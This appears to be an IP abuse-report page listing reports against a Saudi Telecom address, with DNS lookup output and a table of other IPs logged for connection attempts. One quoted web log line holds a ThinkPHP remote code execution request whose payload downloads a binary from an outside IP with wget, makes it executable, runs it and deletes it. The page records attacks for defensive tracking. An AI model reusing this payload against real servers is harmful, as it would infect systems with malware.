City: unknown
Region: unknown
Country: Saudi Arabia
Internet Service Provider: Saudi Telecom Company JSC
Hostname: unknown
Organization: unknown
Usage Type: unknown
| Type | Details | Datetime |
|---|---|---|
| attack | 2.91.141.172 - - \[05/Jul/2019:19:56:37 +0200\] "GET /index.php\?s=/index/\x09hink\x07pp/invokefunction\&function=call_user_func_array\&vars\[0\]=shell_exec\&vars\[1\]\[\]='wget http://185.172.110.245/x86 -O thonkphp \; chmod 777 thonkphp \; ./thonkphp ThinkPHP \; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0" ... |
2019-07-06 08:11:51 |
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 2.91.141.172
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 45637
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;2.91.141.172. IN A
;; AUTHORITY SECTION:
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019070501 1800 900 604800 86400
;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Sat Jul 06 08:11:45 CST 2019
;; MSG SIZE rcvd: 116
Host 172.141.91.2.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 67.207.67.2
Address: 67.207.67.2#53
** server can't find 172.141.91.2.in-addr.arpa: NXDOMAIN
| IP | Type | Details | Datetime |
|---|---|---|---|
| 180.96.14.25 | attack | Unauthorized connection attempt detected from IP address 180.96.14.25 to port 7001 [T] |
2020-01-09 01:50:01 |
| 81.88.221.227 | attackspam | Unauthorized connection attempt detected from IP address 81.88.221.227 to port 81 [T] |
2020-01-09 01:39:53 |
| 164.52.24.162 | attackspam | Unauthorized connection attempt detected from IP address 164.52.24.162 to port 443 [T] |
2020-01-09 02:13:16 |
| 92.252.173.254 | attack | Unauthorized connection attempt detected from IP address 92.252.173.254 to port 445 [T] |
2020-01-09 01:38:35 |
| 111.76.16.130 | attackbotsspam | Unauthorized connection attempt detected from IP address 111.76.16.130 to port 445 [T] |
2020-01-09 01:37:01 |
| 114.229.141.119 | attack | Unauthorized connection attempt detected from IP address 114.229.141.119 to port 2323 [T] |
2020-01-09 01:57:32 |
| 120.194.198.44 | attack | Unauthorized connection attempt detected from IP address 120.194.198.44 to port 6380 [T] |
2020-01-09 01:55:29 |
| 42.121.98.191 | attackbots | Unauthorized connection attempt detected from IP address 42.121.98.191 to port 445 [T] |
2020-01-09 02:05:54 |
| 182.106.207.51 | attack | Unauthorized connection attempt detected from IP address 182.106.207.51 to port 1433 [T] |
2020-01-09 01:49:46 |
| 62.117.113.52 | attack | Unauthorized connection attempt detected from IP address 62.117.113.52 to port 445 [T] |
2020-01-09 01:40:16 |
| 49.175.229.54 | attack | Unauthorized connection attempt detected from IP address 49.175.229.54 to port 4567 [T] |
2020-01-09 01:42:45 |
| 183.88.134.116 | attackbotsspam | Unauthorized connection attempt detected from IP address 183.88.134.116 to port 5555 [T] |
2020-01-09 02:10:37 |
| 195.2.238.235 | attackbotsspam | Unauthorized connection attempt detected from IP address 195.2.238.235 to port 23 [T] |
2020-01-09 02:09:53 |
| 42.113.229.1 | attack | Unauthorized connection attempt detected from IP address 42.113.229.1 to port 23 [T] |
2020-01-09 02:07:38 |
| 218.108.218.12 | attackbots | Unauthorized connection attempt detected from IP address 218.108.218.12 to port 23 [T] |
2020-01-09 01:47:35 |